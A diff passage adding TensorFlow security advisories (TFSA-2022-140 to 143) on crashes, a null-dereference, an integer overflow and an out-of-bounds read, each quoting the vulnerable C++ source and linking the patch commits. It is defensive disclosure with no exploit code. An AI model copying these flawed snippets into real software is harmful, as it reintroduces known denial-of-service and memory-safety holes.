+When [`mlir::tfg::GraphDefImporter::ConvertNodeDef`](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/core/ir/importexport/graphdef_import.cc) tries to convert NodeDefs without an op name, it crashes.
+```cpp
+Status GraphDefImporter::ConvertNodeDef(OpBuilder &builder, ConversionState &s,
+ const NodeDef &node) {
+ VLOG(4) << "Importing: " << node.name();
+ OperationState state(ConvertLocation(node), absl::StrCat("tfg.", node.op()));
+
+ // The GraphImporter does light shape inference, but here we will defer all of
+ // that to the shape inference pass.
+ const OpDef *op_def;
+ const OpRegistrationData *op_reg_data = nullptr;
+ if ((op_reg_data = registry_.LookUp(node.op()))) {
+ op_def = &op_reg_data->op_def;
+ } else {
+ auto it = function_op_defs_.find(node.op());
+ if (it == function_op_defs_.end())
+ return InvalidArgument("Unable to find OpDef for ", node.op());
+ op_def = it->second;
+ }
+```
+`node.op()` cannot be empty.
+
+
+### Patches
+We have patched the issue in GitHub commit [a0f0b9a21c9270930457095092f558fbad4c03e5](https://github.com/tensorflow/tensorflow/commit/a0f0b9a21c9270930457095092f558fbad4c03e5).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
diff --git a/tensorflow/security/advisory/tfsa-2022-140.md b/tensorflow/security/advisory/tfsa-2022-140.md
new file mode 100644
index 0000000..7b745c8
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-140.md
@@ -0,0 +1,66 @@
+## TFSA-2022-140: Null-dereference in `mlir::tfg::TFOp::nameAttr`
+
+### CVE Number
+CVE-2022-36014
+
+### Impact
+When [`mlir::tfg::TFOp::nameAttr`](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/core/ir/importexport/graphdef_import.cc) receives null type list attributes, it crashes.
+```cpp
+
+StatusOr<unsigned> GraphDefImporter::ArgNumType(const NamedAttrList &attrs,
+ const OpDef::ArgDef &arg_def,
+ SmallVectorImpl<Type> &types) {
+ // Check whether a type list attribute is specified.
+ if (!arg_def.type_list_attr().empty()) {
+ if (auto v = attrs.get(arg_def.type_list_attr()).dyn_cast<ArrayAttr>()) {
+ for (Attribute attr : v) {
+ if (auto dtype = attr.dyn_cast<TypeAttr>()) {
+ types.push_back(UnrankedTensorType::get(dtype.getValue()));
+ } else {
+ return InvalidArgument("Expected '", arg_def.type_list_attr(),
+ "' to be a list of types");
+ }
+ }
+ return v.size();
+ }
+ return NotFound("Type attr not found: ", arg_def.type_list_attr());
+ }
+
+ unsigned num = 1;
+ // Check whether a number attribute is specified.
+ if (!arg_def.number_attr().empty()) {
+ if (auto v = attrs.get(arg_def.number_attr()).dyn_cast<IntegerAttr>()) {
+ num = v.getValue().getZExtValue();
+ } else {
+ return NotFound("Type attr not found: ", arg_def.number_attr());
+ }
+ }
+
+ // Check for a type or type attribute.
+ Type dtype;
+ if (arg_def.type() != DataType::DT_INVALID) {
+ TF_RETURN_IF_ERROR(ConvertDataType(arg_def.type(), b_, &dtype));
+ } else if (arg_def.type_attr().empty()) {
+ return InvalidArgument("Arg '", arg_def.name(),
+ "' has invalid type and no type attribute");
+ } else {
+ if (auto v = attrs.get(arg_def.type_attr()).dyn_cast<TypeAttr>()) {
+ dtype = v.getValue();
+ } else {
+ return NotFound("Type attr not found: ", arg_def.type_attr());
+ }
+ }
+ types.append(num, UnrankedTensorType::get(dtype));
+ return num;
+}
+```
+
+
+### Patches
+We have patched the issue in GitHub commits [3a754740d5414e362512ee981eefba41561a63a6](https://github.com/tensorflow/tensorflow/commit/3a754740d5414e362512ee981eefba41561a63a6) and [a0f0b9a21c9270930457095092f558fbad4c03e5](https://github.com/tensorflow/tensorflow/commit/a0f0b9a21c9270930457095092f558fbad4c03e5).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
diff --git a/tensorflow/security/advisory/tfsa-2022-141.md b/tensorflow/security/advisory/tfsa-2022-141.md
new file mode 100644
index 0000000..9c9fccf
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-141.md
@@ -0,0 +1,33 @@
+## TFSA-2022-141: Integer overflow in math ops
+
+### CVE Number
+CVE-2022-36015
+
+### Impact
+When [`RangeSize`](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/core/ops/math_ops.cc) receives values that do not fit into an `int64_t`, it crashes.
+```cpp
+ auto size = (std::is_integral<T>::value
+ ? ((Eigen::numext::abs(limit - start) +
+ Eigen::numext::abs(delta) - T(1)) /
+ Eigen::numext::abs(delta))
+ : (Eigen::numext::ceil(
+ Eigen::numext::abs((limit - start) / delta))));
+
+ // This check does not cover all cases.
+ if (size > std::numeric_limits<int64_t>::max()) {
+ return errors::InvalidArgument("Requires ((limit - start) / delta) <= ",
+ std::numeric_limits<int64_t>::max());
+ }
+
+ c->set_output(0, c->Vector(static_cast<int64_t>(size)));
+ return Status::OK();
+}
+```
+
+### Patches
+We have patched the issue in GitHub commit [37e64539cd29fcfb814c4451152a60f5d107b0f0](https://github.com/tensorflow/tensorflow/commit/37e64539cd29fcfb814c4451152a60f5d107b0f0).
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
diff --git a/tensorflow/security/advisory/tfsa-2022-142.md b/tensorflow/security/advisory/tfsa-2022-142.md
new file mode 100644
index 0000000..85ab461
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-142.md
@@ -0,0 +1,23 @@
+## TFSA-2022-142: `CHECK`-fail in `tensorflow::full_type::SubstituteFromAttrs`
+
+### CVE Number
+CVE-2022-36016
+
+### Impact
+When [`tensorflow::full_type::SubstituteFromAttrs`](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/core/ops/math_ops.cc) receives a `FullTypeDef& t` that is not exactly three args, it triggers a `CHECK`-fail instead of returning a status.
+```cpp
+Status SubstituteForEach(AttrMap& attrs, FullTypeDef& t) {
+ DCHECK_EQ(t.args_size(), 3);
+
+ const auto& cont = t.args(0);
+ const auto& tmpl = t.args(1);
+ const auto& t_var = t.args(2);
+```
+
+### Patches
+We have patched the issue in GitHub commit [6104f0d4091c260ce9352f9155f7e9b725eab012](https://github.com/tensorflow/tensorflow/commit/6104f0d4091c260ce9352f9155f7e9b725eab012).
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
diff --git a/tensorflow/security/advisory/tfsa-2022-143.md b/tensorflow/security/advisory/tfsa-2022-143.md
new file mode 100644
index 0000000..a255ba1
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-143.md
@@ -0,0 +1,21 @@
+## TFSA-2022-143: OOB read in `Gather_nd` op in TF Lite Micro
+
+### CVE Number
+CVE-2022-35938
+
+### Impact
+The [`GatherNd`](https://github.com/tensorflow/tflite-micro/blob/1bc98621180a350eb4e8d3318ea8e228c7559b37/tensorflow/lite/micro/kernels/gather_nd.cc#L143-L154) function takes arguments that determine the sizes of inputs and outputs. If the inputs given are greater than or equal to the sizes of the outputs, an out-of-bounds memory read or a crash is triggered.
+
+### Patches
+We have patched the issue in GitHub commit [4142e47e9e31db481781b955ed3ff807a781b494](https://github.com/tensorflow/tflite-micro/commit/4142e47e9e31db481781b955ed3ff807a781b494).
+
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Hui Peng from Baidu Security.
